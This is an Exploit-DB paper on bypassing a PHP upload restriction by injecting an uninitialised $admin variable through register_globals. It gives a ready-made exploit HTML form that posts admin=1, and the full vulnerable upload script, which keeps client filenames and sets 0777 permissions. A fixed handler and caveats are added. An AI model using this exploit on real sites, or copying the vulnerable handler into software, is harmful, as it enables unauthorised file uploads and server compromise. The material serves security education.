Bypassing UPLOAD Variable

EDB-ID:

13706

CVE:

N/A

Author:

GlaDiaT0R

Type:

papers

Platform:

Multiple

Published:

2010-05-20

                     ###############################################################################
                     # [+]Title: [Bypassing UPLOAD Variable]                                       #
                     ###############################################################################
                     # [+] About :                                                                 #
                     ###############################################################################
                     # Written by :  GlaDiaT0R                                                     #
                     # Contact: the_gl4di4t0r[AT]hotmail[DOT]com / berrahal.ryadh[AT]gmail[DOT]com #
                     # Team :  Tunisian Power Team  ( DarkGh0st.Net )                              #
                     ###############################################################################
                     # [+]    Summary:                                                             #
                     #           [1]-Introduction                                                  #
                     #           [2]-Detection                                                     #
                     #           [3]-Exploiting..                                                  #
                     #           [4]-Vulnerable Source code                                        #
                     ###############################################################################


[1]-Introduction

Bypassing a vulnerable PHP upload script works the same way as bypassing a vulnerable login script.
In both cases the script relies on a variable whose value is used to authorise the request: when it holds the expected value, the request is accepted.
It is therefore possible to build a POST request that carries that variable with the authorising value, so that the file is accepted regardless of the restrictions the script was meant to enforce.


=======================================================


[2]-Detection

To find this vulnerability you need the source code the site runs (for example because the vulnerable code ships in a publicly distributed site template, or because you obtained the source some other way).
You must also know the name of the variable and the value it has to hold for the request to be accepted.


=======================================================


[3]-Exploiting..

In our example the upload script checks a number of properties of the uploaded file (pixel dimensions against maximum and minimum values, and the file size) and, when the checks pass, sets the variable $admin to 1; that value is what authorises the upload.
Because $admin is never initialised before the checks, it is enough to build a POST request containing a field named admin with the value "1" to bypass the restrictions of the vulnerable upload.
Caveat: the injected field only lands in $admin when PHP imports request parameters into the script's global scope, that is, with register_globals enabled (off by default since PHP 4.2 and removed in PHP 5.4) or when the script does it itself with something like extract($_POST). Without that, $admin stays unset and a non-image such as a PHP script is rejected, because getimagesize() returns false and the check $infos_img[0] > $height_min fails.
----------
vuln :
if(($infos_img[0] <= $width_max) && ($infos_img[1] <= $height_max) && ($_FILES['fupload']['size'] <= $max_size) && ($infos_img[0] > $height_min) && ($infos_img[1] > $width_min))
{
$admin = 1;
}
if  ($admin == 1 ){
// UPLOAD
---
exploit.html :

<html>

<head>
<title>/null</title>
<meta name="generator" content="Web Editor">
</head>
<body>
<p><form action="http://website.com/upload.php" name='upload' method='post' enctype='multipart/form-data'>
<input type="file" name="fupload"><input type="hidden" name="admin" value="1">
<input type="submit" value="Upload!">
</form></p>
</body>

</html>
---


=======================================================


[4]-Vulnerable Source code

<?PHP
$max_size   = 1000000;
$width_max  = 2500;
$height_max = 2500;
$width_min  = 0;
$height_min = 0;

$nom_file   = $_FILES['fupload']['name'];
$taille     = $_FILES['fupload']['size'];
$tmp        = $_FILES['fupload']['tmp_name'];
$infos_img  = getimagesize($_FILES['fupload']['tmp_name']);

if(isset($_FILES['fupload']))
{
// $admin is never initialised: it is only set to 1 here, when the checks pass.
// With register_globals on, a POST field admin=1 has already set it before this point.
// (Note: [0] is the width and [1] the height; the two minimum checks compare them
// the wrong way round, which is harmless while both minimums are 0.)
if(($infos_img[0] <= $width_max) && ($infos_img[1] <= $height_max) && ($_FILES['fupload']['size'] <= $max_size) && ($infos_img[0] > $height_min) && ($infos_img[1] > $width_min))
{
$admin = 1;
}
if  ($admin == 1 ){

    $slozka = "upload";
    // the file keeps the client-supplied name; the extension is never checked
    $cil = $slozka . "/" .$_FILES['fupload']['name'];
    $nazev_souboru = $_FILES['fupload']['tmp_name'];
    $copy = move_uploaded_file($nazev_souboru, $cil);
    chmod ($cil, 0777);
    echo "file " .$_FILES['fupload']['name']. " uploaded to the server.\n
<a href=\"$cil\"><h2>your file</h2></a>";
}
else
echo "ERROR" . $_FILES['fupload']['error'];
}
?>
<p><form action="upload.php" name='upload' method='post' enctype='multipart/form-data'>
<input type="file" name="fupload">
<input type="submit" value="Upload!">
</form>

----------
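The same handler rewritten to close the hole, as an added example written for this page and not part of the paper: $admin is initialised before the checks, so a request can no longer pre-set it; the upload is honoured only when the type, dimension and size checks pass; the file is stored under a name and extension the server chooses (the original keeps the client's filename and never looks at the extension, so a file that starts with a valid image header passes getimagesize() whatever its extension); and the 0777 chmod is dropped. The directory name and the size limits are taken from the original. The allowed image types, the 0644 mode and the use of random_bytes() (PHP 7 or later) are assumptions.

```php
<?php
// Hardened replacement for the upload.php above (added example, not the paper's code).
// Limits and directory name kept from the original; everything else is an assumption.

$max_size   = 1000000;
$width_max  = 2500;
$height_max = 2500;
$width_min  = 0;
$height_min = 0;
$upload_dir = __DIR__ . '/upload';

// 1. Never rely on an uninitialised flag. $admin starts false and is only ever
//    set by this script. Under register_globals (or after extract($_POST)) an
//    uninitialised $admin would have been attacker-controlled.
$admin = false;

// Types accepted, keyed by the IMAGETYPE_* constant getimagesize() reports (assumption).
$allowed = [IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];

if (isset($_FILES['fupload']) && is_array($_FILES['fupload'])
    && $_FILES['fupload']['error'] === UPLOAD_ERR_OK
    && is_uploaded_file($_FILES['fupload']['tmp_name'])) {

    $tmp  = $_FILES['fupload']['tmp_name'];
    $size = $_FILES['fupload']['size'];

    // 2. Decide the file type from the bytes, never from the client filename.
    $infos_img = @getimagesize($tmp);

    if ($infos_img !== false
        && isset($allowed[$infos_img[2]])
        && $infos_img[0] <= $width_max && $infos_img[1] <= $height_max
        && $infos_img[0] >  $width_min && $infos_img[1] >  $height_min
        && $size <= $max_size) {
        $admin = true;
    }
}

if ($admin === true) {
    // 3. Server-chosen name and extension: the client's name never reaches the disk.
    $ext = $allowed[$infos_img[2]];
    $cil = $upload_dir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;

    if (move_uploaded_file($tmp, $cil)) {
        chmod($cil, 0644);   // 4. readable, not world-writable
        echo 'file stored as ' . htmlspecialchars(basename($cil), ENT_QUOTES, 'UTF-8') . "\n";
    } else {
        http_response_code(500);
        echo "ERROR storing file\n";
    }
} else {
    http_response_code(400);
    echo "ERROR file rejected\n";
}
```

Initialising $admin on its own is enough to stop the variable injection described in this paper; the remaining changes address the other weaknesses visible in the original code (client-controlled filename, no extension check, 0777 permissions).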

I think it's easy now to bypass any upload variable if the source code is vulnerable ;)
Any questions or suggestions? Contact me at the_gl4di4t0r[AT]hotmail[DOT]com